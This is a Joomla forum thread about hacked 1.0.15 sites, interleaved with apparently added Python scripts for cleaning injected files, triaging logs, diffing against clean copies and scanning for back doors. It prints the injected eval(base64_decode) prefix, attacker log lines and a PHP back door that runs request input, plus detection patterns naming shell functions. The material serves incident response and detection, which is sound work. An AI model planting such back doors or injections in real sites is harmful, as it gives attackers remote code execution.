Joomla 1.0.15 site being hacked and redirected

qqwwong
Joomla! Apprentice
Posts: 22
Joined: Mon Apr 03, 2006 9:08 am
Location: Hong Kong


Post by qqwwong » Mon Sep 27, 2010 4:00 am

I have a Joomla 1.0.15 site. It was hacked. When it is accessed, it is redirected to a suspicious site. When I looked at the source of my site, I found all the php files had been changed. A piece of suspicious code was added to the beginning of every php file. It looks like


<?php /**/ eval(base64_decode(".........."));?>
Does anyone have any clue how this happens?

Thanks in advance.

Wai
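The injected prefix qqwwong describes is a known shape, so the first thing to do with a copy of the site is to decode what it runs and strip it from every file. The script below is an added example, not code from the post or from Joomla: it matches the `<?php /**/ eval(base64_decode("..."));?>` prefix at the start of each .php file, decodes the payload (peeling further `eval(base64_decode())` layers if the payload is wrapped more than once, which is an assumption about how such payloads are built), and optionally cuts the prefix out. The demo tree it builds is constructed for illustration; the real payload is not on the page.

```python
"""Strip the injected eval(base64_decode(...)) prefix from PHP files and show what it decodes to."""
import base64
import re
import tempfile
from pathlib import Path

# Shape of the prefix quoted in the post: <?php /**/ eval(base64_decode(".........."));?>
# Tolerating extra whitespace around the tokens is an assumption; the post shows one exact form.
PREFIX_RE = re.compile(
    r'^<\?php\s*/\*\*/\s*eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*;\s*\?>[ \t]*\r?\n?'
)
# A decoded payload may itself be one more eval(base64_decode("...")) layer.
INNER_RE = re.compile(r'^\s*eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*;?\s*$')


def unwrap(b64):
    """Decode the payload, peeling nested eval(base64_decode()) layers; return (layers, final_code)."""
    code = base64.b64decode(b64, validate=True).decode("utf-8", "replace")
    layers = 1
    m = INNER_RE.match(code)
    while m:
        code = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        layers += 1
        m = INNER_RE.match(code)
    return layers, code


def find_prefix(text):
    """Return (layers, decoded_code, clean_text) if text starts with the injected prefix, else None."""
    m = PREFIX_RE.match(text)
    if not m:
        return None
    layers, code = unwrap(m.group(1))
    return layers, code, text[m.end():]


def clean_tree(root, dry_run=True):
    """Walk root; map each infected .php file (POSIX relative path) to its decoded payload.
    With dry_run=False the prefix is cut from the file; the rest of the file is left untouched."""
    root = Path(root)
    hits = {}
    for path in sorted(root.rglob("*.php")):
        text = path.read_text(encoding="utf-8", errors="replace")
        found = find_prefix(text)
        if found is None:
            continue
        layers, code, clean = found
        hits[path.relative_to(root).as_posix()] = {"layers": layers, "code": code}
        if not dry_run:
            path.write_text(clean, encoding="utf-8")
    return hits


def build_demo_site():
    """Constructed sample tree (not from the post): one clean file, one carrying a two-layer payload."""
    root = Path(tempfile.mkdtemp())
    inner = base64.b64encode(b'echo "constructed payload";').decode()
    outer = base64.b64encode(f'eval(base64_decode("{inner}"));'.encode()).decode()
    (root / "index.php").write_text(
        f'<?php /**/ eval(base64_decode("{outer}"));?>\n<?php\n// original index.php\n', encoding="utf-8")
    (root / "configuration.php").write_text("<?php\n// original configuration.php\n", encoding="utf-8")
    return str(root)


if __name__ == "__main__":
    site = build_demo_site()
    for rel, info in clean_tree(site).items():
        print(f"{rel}: {info['layers']} layer(s) -> {info['code']}")
    clean_tree(site, dry_run=False)
```

Run it in dry-run mode first and read the decoded code: it tells you what the attacker wanted the site to do (the redirect), but not how they got in. Stripping the prefix removes the symptom only; as the rest of the thread shows, the dropped file that let them write to every .php in the first place has to be found separately.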

mark_up
Joomla! Guru
Posts: 849
Joined: Sun Oct 29, 2006 10:51 am
Location: Fiji

Re: Joomla 1.0.15 site being hacked and redirected

Post by mark_up » Mon Sep 27, 2010 4:30 am

Hi qqwwong,

Your website could have been hacked in a number of different ways, i.e. there is nothing in the information you have provided that hints at any particular exploit.

It may be that an extension installed on your website had a vulnerability that was exploited, or maybe your host hasn't properly secured their server. Maybe the computer you use was infected with malware that grabbed your password from somewhere you stored it (an FTP client perhaps?), or maybe as you typed it in (a keylogger). Maybe the network you accessed your site from was compromised and the passwords simply pulled off the wire (they are sent in plain text if you don't use SSL for your admin).

Basically, there are numerous ways a website can be compromised.

I would suggest wiping your server clean, i.e. remove all files and databases, and reinstall from a clean backup. Change all your FTP, cPanel, and Joomla passwords.

I would also consider migrating to Joomla 1.5 since I doubt the extensions you use on your website are still being actively maintained and patched.

I'm sorry this happened to you; I know how it feels. That said, I can offer nothing more than the old advice, "backup! backup! backup!" Hopefully you already knew that and have a good backup you can restore from.

Good luck!
-Mark
http://twitter.com/mark_up.
Opinions expressed are mine alone and don't necessarily represent the views of any organisation I am associated with.

biirc
Joomla! Enthusiast
Posts: 145
Joined: Thu Mar 12, 2009 11:34 am

Re: Joomla 1.0.15 site being hacked and redirected

Post by biirc » Thu Sep 30, 2010 2:01 pm

Hi,

We have the same problem on a site in Joomla 1.0.15.

A Russian guy has the same problem too:

http://joomlaforum.ru/index.php?topic=131149.0

With a password (htpasswd) on the administrator area it will block the attack.

On my site I have (web log):

81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:25 +0200] "GET /administrator/index.php HTTP/1.1" 200 992 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:26 +0200] "POST /administrator/index.php HTTP/1.1" 200 69 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:27 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot HTTP/1.1" 200 6896 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:29 +0200] "POST /administrator/index2.php HTTP/1.1" 200 4689 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:30 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot HTTP/1.1" 200 6938 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:31 +0200] "POST /mambots/system/loginJ00mla.php HTTP/1.1" 200 36 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:32 +0200] "POST /administrator/index2.php HTTP/1.1" 301 20 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:32 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot&mosmsg=SUCCES+ HTTP/1.1" 200 6893 "-" "Opera/9.51 (Windows NT 5.1; U; en)"

But I have no log on the FTP side.

I don't know how they put this: /mambots/system/loginJ00mla.php

Stéphane
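The eight log lines above already contain the whole story, if they are read as a sequence rather than line by line: a login to /administrator, two visits to the extension installer with a mambot upload in between, a direct POST to a brand-new file under /mambots/, and then an installer "SUCCES" message. The script below is an added example (not from the post, and not a Joomla tool) that parses those exact lines and flags both the individual oddities and the installer-then-direct-script sequence per client IP. The parser assumes the log format seen in the post, i.e. client IP, one masked field, a dash, and then the usual combined-format fields; the 300-second window and the list of extension directories are assumptions.

```python
"""Triage an Apache access log for the installer-then-direct-script pattern seen in the thread."""
import re
from collections import defaultdict
from datetime import datetime

# The eight lines from biirc's post, as a fixed sample.
SAMPLE_LOG = """\
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:25 +0200] "GET /administrator/index.php HTTP/1.1" 200 992 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:26 +0200] "POST /administrator/index.php HTTP/1.1" 200 69 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:27 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot HTTP/1.1" 200 6896 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:29 +0200] "POST /administrator/index2.php HTTP/1.1" 200 4689 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:30 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot HTTP/1.1" 200 6938 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:31 +0200] "POST /mambots/system/loginJ00mla.php HTTP/1.1" 200 36 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:32 +0200] "POST /administrator/index2.php HTTP/1.1" 301 20 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:32 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot&mosmsg=SUCCES+ HTTP/1.1" 200 6893 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
"""

# Field order assumed from the post: ip, masked field, user, [timestamp], "METHOD target proto", status, bytes, "referer", "ua"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) (?P<masked>\S+) (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Scripts under extension directories are included by Joomla's index.php; a browser never requests them directly.
EXT_SCRIPT_RE = re.compile(r'^/(mambots|plugins|components|modules)/[^?]*\.php(\?|$)')
INSTALLER = "option=com_installer"


def parse_ts(s):
    return datetime.strptime(s, "%d/%b/%Y:%H:%M:%S %z")


def parse_log(text):
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rows.append(m.groupdict())
    return rows


def flag_requests(rows):
    """Per-line findings as (row index, reason)."""
    out = []
    for i, r in enumerate(rows):
        if EXT_SCRIPT_RE.match(r["target"]):
            out.append((i, "direct request to a script under an extension directory"))
        if INSTALLER in r["target"] and r["method"] == "GET":
            out.append((i, "administrator extension installer opened"))
        if "mosmsg=SUCCES" in r["target"]:
            out.append((i, "installer reported success"))
    return out


def installer_drop_sequences(rows, window_seconds=300):
    """Per client IP: installer activity followed, within the window, by a direct hit on a script under an
    extension directory, i.e. 'install a mambot, then call the file it dropped'."""
    by_ip = defaultdict(list)
    for r in rows:
        by_ip[r["ip"]].append(r)
    out = []
    for ip, reqs in by_ip.items():
        last_installer = None
        for r in reqs:
            t = parse_ts(r["ts"])
            if INSTALLER in r["target"]:
                last_installer = t
            elif (EXT_SCRIPT_RE.match(r["target"]) and last_installer is not None
                  and (t - last_installer).total_seconds() <= window_seconds):
                out.append({"ip": ip, "installer_at": last_installer.isoformat(),
                            "script": r["target"].split("?")[0], "script_at": t.isoformat(),
                            "status": r["status"]})
    return out


if __name__ == "__main__":
    rows = parse_log(SAMPLE_LOG)
    for i, why in flag_requests(rows):
        print(f"line {i + 1}: {why}")
    for seq in installer_drop_sequences(rows):
        print("installer drop:", seq)
```

Note what the sequence does and does not prove: the first POST to /administrator/index.php returned 200 with 69 bytes, so whoever this was logged in with working administrator credentials, and the installer did the rest. The log cannot tell you where those credentials came from, which is exactly the gap the thread goes on to discuss.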

qqwwong
Joomla! Apprentice
Posts: 22
Joined: Mon Apr 03, 2006 9:08 am
Location: Hong Kong

Re: Joomla 1.0.15 site being hacked and redirected

Post by qqwwong » Sat Oct 02, 2010 1:49 pm

biirc wrote:
With a password (htpasswd) on the administrator area it will block the attack.
[...]
I don't know how they put this: /mambots/system/loginJ00mla.php

Stéphane
Hi Stéphane,

Thank you for your message. I had exactly the same problem, and found the strange file "loginJ00mla.php". I found the timestamp of this file is different from the timestamp on all other php files that had been modified. I'm still not able to figure out how the file was injected into the system. I already added a password to protect the admin back-end page.

Wai

mark_up
Joomla! Guru
Posts: 849
Joined: Sun Oct 29, 2006 10:51 am
Location: Fiji

Re: Joomla 1.0.15 site being hacked and redirected

Post by mark_up » Sat Oct 02, 2010 2:31 pm

Have you checked the extensions on your site against the Joomla Vulnerable Extensions list? Maybe you have a vulnerable extension installed.

mandville
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Joomla 1.0.15 site being hacked and redirected

Post by mandville » Sat Oct 02, 2010 2:54 pm

Apart from the extensions, I would also check the folder permissions. I do notice the mambot phrase, which indicates it's a very old system; perhaps you are using Mambo extensions or even Mambo itself!

Run through this checklist and perhaps provide information on your installs, e.g. Joomla 1.0.13 etc.

[ ] Run the forum post assistant and security tool Instructions available here

[ ] Ensure you have the latest version of Joomla. Delete all files in your Joomla installation. Replace the deleted files with fresh copies of a current full version of Joomla, and fresh copies of extensions and templates used. Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted and hidden in files and directories

[ ] Review Vulnerable Extensions List

[ ] Review and action Security Checklist checklist 7 to make sure you've gone through all of the steps.

[ ] Change all passwords and if possible user names for the website host control panel and your Joomla site.

[ ] Use proper permissions on files and directories. They should never be 777; the ideal is 644 and 755.

[ ] Check your htaccess for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

If you feel none of the above applies to you read these admin tips and the what went wrong post
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
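Three items on that checklist (replace every file from a clean copy, never 777, look for odd lines in .htaccess) reduce to one comparison: take a clean copy of the same Joomla version and extensions, and diff the live tree against it. The script below is an added example, not from the post and not a Joomla utility: it hashes both trees, reports files that were added, modified or are missing, lists anything world-writable in the live tree, and prints .htaccess directives that the clean copy does not contain. The demo trees it builds are constructed for illustration (the redirect rule and the stand-in for loginJ00mla.php are invented); on a real site you point it at the live docroot and at a freshly unpacked copy of the same packages.

```python
"""Compare a live Joomla tree against a clean copy: added/modified files, world-writable paths, extra .htaccess lines."""
import hashlib
import os
import shutil
import stat
import tempfile
from pathlib import Path


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def index_tree(root):
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_of(p) for p in root.rglob("*") if p.is_file()}


def audit(site, clean):
    """Diff the live tree (site) against the reference tree (clean); also list world-writable paths in site."""
    live, ref = index_tree(site), index_tree(clean)
    report = {
        "added": sorted(set(live) - set(ref)),
        "modified": sorted(p for p in live if p in ref and live[p] != ref[p]),
        "missing": sorted(set(ref) - set(live)),
        "world_writable": [],
    }
    for p in Path(site).rglob("*"):
        if p.lstat().st_mode & stat.S_IWOTH:  # 777 / 666: any account on the box can write here
            report["world_writable"].append(p.relative_to(site).as_posix())
    report["world_writable"].sort()
    return report


def htaccess_extra_lines(site, clean):
    """Directives in the live .htaccess that the clean one does not contain (comments and blanks ignored)."""
    def directives(root):
        f = Path(root) / ".htaccess"
        if not f.exists():
            return []
        lines = f.read_text(encoding="utf-8", errors="replace").splitlines()
        return [l.strip() for l in lines if l.strip() and not l.strip().startswith("#")]
    ref = set(directives(clean))
    return [l for l in directives(site) if l not in ref]


def build_demo():
    """Constructed clean and live copies (not files from the post). The live tree gains a dropped script,
    a prefix-injected index.php, an extra redirect rule in .htaccess and a 777 directory."""
    base = Path(tempfile.mkdtemp())
    clean, site = base / "clean", base / "site"
    (clean / "images").mkdir(parents=True)
    (clean / "index.php").write_text("<?php\n// clean index.php\n")
    (clean / "configuration.php").write_text("<?php\n// clean configuration.php\n")
    (clean / ".htaccess").write_text("# Joomla sample .htaccess\nRewriteEngine On\n")
    shutil.copytree(clean, site)
    (site / "index.php").write_text('<?php /**/ eval(base64_decode("Y29uc3RydWN0ZWQ="));?>\n<?php\n// clean index.php\n')
    (site / "mambots" / "system").mkdir(parents=True)
    (site / "mambots" / "system" / "loginJ00mla.php").write_text("<?php\n// constructed stand-in for the dropped file\n")
    with open(site / ".htaccess", "a") as fh:
        fh.write("RewriteRule .* http://redirect.invalid/ [R=301,L]\n")  # constructed redirect line
    os.chmod(site / "images", 0o777)
    return str(site), str(clean)


if __name__ == "__main__":
    site, clean = build_demo()
    for key, val in audit(site, clean).items():
        print(f"{key}: {val}")
    print("extra .htaccess lines:", htaccess_extra_lines(site, clean))
```

The "added" list is the one to read first: a file that exists on the live site and in no package you installed (here the stand-in for loginJ00mla.php) is either yours or the attacker's, and mtime alone will not tell you which, since it can be set freely. Configuration files you edited will show up under "modified" and need to be reviewed by hand rather than overwritten.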

VegardAa
Joomla! Intern
Posts: 89
Joined: Wed Oct 28, 2009 12:14 pm

Re: Joomla 1.0.15 site being hacked and redirected

Post by VegardAa » Mon Oct 04, 2010 10:28 am

Hello! We had the same problem. We think we found the point of entry -> com_mtree. Do you have that component installed? If so I would recommend upgrading it.

qqwwong
Joomla! Apprentice
Posts: 22
Joined: Mon Apr 03, 2006 9:08 am
Location: Hong Kong

Re: Joomla 1.0.15 site being hacked and redirected

Post by qqwwong » Mon Oct 04, 2010 3:26 pm

VegardAa wrote:
Hello! We had the same problem. We think we found the point of entry -> com_mtree. Do you have that component installed? If so I would recommend upgrading it.

Thank you for all your replies. I don't have this particular component installed. I'm now checking the extensions of the site against the Vulnerable Extensions List.
I had such an old version of Joomla because my client was unwilling to upgrade, because the site worked for them. This time, they are convinced to upgrade to 1.5.x. Hope that can be done as soon as possible. Meanwhile, I have used an .htaccess password to protect the administrator page.

mandville
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Joomla 1.0.15 site being hacked and redirected

Post by mandville » Mon Oct 04, 2010 7:22 pm

Please note: most of the VEL entries are 1.5.x only, BUT some may work on or be based on those for 1.0.x.

biirc
Joomla! Enthusiast
Posts: 145
Joined: Thu Mar 12, 2009 11:34 am

Re: Joomla 1.0.15 site being hacked and redirected

Post by biirc » Tue Oct 05, 2010 1:42 pm

Hi,

This is the list of the components, modules and mambots we have

Components :
- GMAccess
- JCal Pro
- JCE Admin
- JooMap
- JPortfolio
- Mambotheme Groups
- ReMOSitory
- Sigsiu Online Business Index 2

Modules :
- mod_jcalpro_latest

Mambots :
- Easy eXtended Gallery
- MOS Document
- MosModule
- Multithumb
- Simple Image Gallery Plugin
- XTypo
- Searchbot for Sigsiu Online Business Index 2
- JCE Utilities 1.5.0

I don't know how the file was injected into the system; I didn't see any attack on the components.
Stéphane

mandville
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Joomla 1.0.15 site being hacked and redirected

Post by mandville » Tue Oct 05, 2010 1:57 pm

The fact that you are using mambots clearly indicates that you are using out-of-date and possibly vulnerable extensions.
I would consider migrating to J1.5, or contact each of the developers and ask for the latest J1.0 version, if you are using J1.0.x.

biirc
Joomla! Enthusiast
Posts: 145
Joined: Thu Mar 12, 2009 11:34 am

Re: Joomla 1.0.15 site being hacked and redirected

Post by biirc » Tue Oct 05, 2010 2:34 pm

Hi, thanks for your answer.
We are in the Joomla! 1.0 » Security - 1.0.x forum; I know there are vulnerabilities.
This client called me because they have a problem.
This site uses GMAccess; I will wait for Joomla 1.6 for the upgrade.

I just want to block the attack, but I didn't see any attack on the components or mambots in the log.

81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:31 +0200] "POST /mambots/system/loginJ00mla.php

This is not normal: they installed a mambot and uninstalled it afterwards. How?

Stéphane

qqwwong
Joomla! Apprentice
Posts: 22
Joined: Mon Apr 03, 2006 9:08 am
Location: Hong Kong

Re: Joomla 1.0.15 site being hacked and redirected

Post by qqwwong » Wed Oct 06, 2010 12:41 pm

biirc wrote:
I just want to block the attack, but I didn't see any attack on the components or mambots in the log.

81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:31 +0200] "POST /mambots/system/loginJ00mla.php

This is not normal: they installed a mambot and uninstalled it afterwards. How?

Stéphane
This is certainly not normal. The system should not have this particular php file. When they POST to this file, they are sending something to your system, and this loginJ00mla.php is receiving the posted data, and possibly capturing username and password. This means that there is another way that the hacker installed this file before the time shown in this log entry.

I got exactly the same log entry (different time). I am not able to find out how this php file was installed yet.

biirc
Joomla! Enthusiast
Posts: 145
Joined: Thu Mar 12, 2009 11:34 am

Re: Joomla 1.0.15 site being hacked and redirected

Post by biirc » Wed Oct 06, 2010 1:41 pm

Hi qqwwong,

I know it's not normal, but I have the same problem.
I am not able to find out how this php file was installed yet.

Nothing in the HTTP log and the FTP log, still searching.

Stéphane

mandville
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Joomla 1.0.15 site being hacked and redirected

Post by mandville » Wed Oct 06, 2010 2:24 pm

biirc wrote:
Hi qqwwong,
Nothing in the HTTP log and the FTP log, still searching.
Stéphane

Can I suggest you look around your host's forums and see if anyone else has been hit by this... possibly it's a jailshell break.

biirc
Joomla! Enthusiast
Posts: 145
Joined: Thu Mar 12, 2009 11:34 am

Re: Joomla 1.0.15 site being hacked and redirected

Post by biirc » Thu Feb 17, 2011 4:55 pm

Hi,
The site of my clients was attacked, but it seems that the last time they put in a back door.

A file at mambots/pluging/login.php containing:

    <?php
    defined( 'INFO_MODULES' ) or die( 'Restricted access.' );

with this function:

    // Back door: whatever the client sends base64-encoded in the "e" request parameter is executed as PHP.
    function jpimport($e)
    {
        if (!isset($_REQUEST['e'])) die( 'Restricted access' );
        else eval(base64_decode($_REQUEST['e']));
    }

qqwwong, can you see this file too on your server? Is it in your backup?

Stéphane.
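The file Stéphane found is the answer to the question that runs through the whole thread: once a one-line `eval(base64_decode($_REQUEST['e']))` exists anywhere under the docroot, the attacker needs no password, no FTP and no vulnerable component to come back, and the "Restricted access" guard above it is only there to look like Joomla's own code. The scanner below is an added example, not from the post and not a Joomla tool: it greps a tree for the idioms that hand request input to eval() or a shell function, including the exact pattern quoted above and the prefix from the first post, while leaving ordinary uses of base64_decode() and $_POST alone. The rule list is an assumption about what is worth flagging, not a complete catalogue, and the demo tree is constructed.

```python
"""Scan PHP files for code that feeds request input to eval()/shell functions, like the jpimport() back door."""
import re
import tempfile
from pathlib import Path

REQ = r'\$_(?:REQUEST|GET|POST|COOKIE|SERVER)'
# (compiled regex, reason). Idioms from this thread plus the usual web-shell variants; assumed, not exhaustive.
RULES = [
    (re.compile(r'\beval\s*\(\s*base64_decode\s*\('), "eval of base64-decoded data"),
    (re.compile(r'\beval\s*\([^;]*' + REQ), "eval of request input"),
    (re.compile(r'\b(?:assert|create_function)\s*\([^;]*' + REQ), "assert/create_function on request input"),
    (re.compile(r'\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\([^;]*' + REQ),
     "shell command built from request input"),
    (re.compile(r'\bpreg_replace\s*\(\s*["\'][^"\']*/[a-zA-Z]*e[a-zA-Z]*["\']'), "preg_replace with the /e modifier"),
    (re.compile(REQ + r'\s*\[[^\]]+\]\s*\('), "function name taken from request input"),
]


def scan_text(text):
    """Reasons (in RULES order) that apply to one file's source."""
    return [reason for rx, reason in RULES if rx.search(text)]


def scan_tree(root):
    """Map POSIX relative path -> reasons for every .php file under root that trips at least one rule."""
    root = Path(root)
    hits = {}
    for p in sorted(root.rglob("*.php")):
        reasons = scan_text(p.read_text(encoding="utf-8", errors="replace"))
        if reasons:
            hits[p.relative_to(root).as_posix()] = reasons
    return hits


def build_demo():
    """Constructed tree: the back door quoted in the post, a prefix-injected index.php, and a benign file."""
    root = Path(tempfile.mkdtemp())
    (root / "mambots" / "pluging").mkdir(parents=True)
    (root / "mambots" / "pluging" / "login.php").write_text(
        "<?php\n"
        "defined( 'INFO_MODULES' ) or die( 'Restricted access.' );\n"
        "function jpimport($e)\n{\n"
        "    if (!isset($_REQUEST['e'])) die( 'Restricted access' );\n"
        "    else eval(base64_decode($_REQUEST['e']));\n}\n")
    # Prefix-injected file as in the first post; the payload here is a constructed placeholder.
    (root / "index.php").write_text('<?php /**/ eval(base64_decode("Y29uc3RydWN0ZWQ="));?>\n<?php echo "site";\n')
    # Legitimate base64_decode() and $_POST use, to show those alone are not flagged.
    (root / "configuration.php").write_text("<?php\n$secret = base64_decode($cfg['token']);\n$name = $_POST['name'];\n")
    return str(root)


if __name__ == "__main__":
    for rel, reasons in scan_tree(build_demo()).items():
        print(f"{rel}: {', '.join(reasons)}")
```

Treat every hit as something to read, not to auto-delete: some legitimate extensions do use eval(), and an attacker can also obfuscate past any fixed regex (string concatenation, `chr()` chains, `str_rot13`). What the scan gives you is a short list to review by hand, which is the step that was missing in this thread until the file was found by accident.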
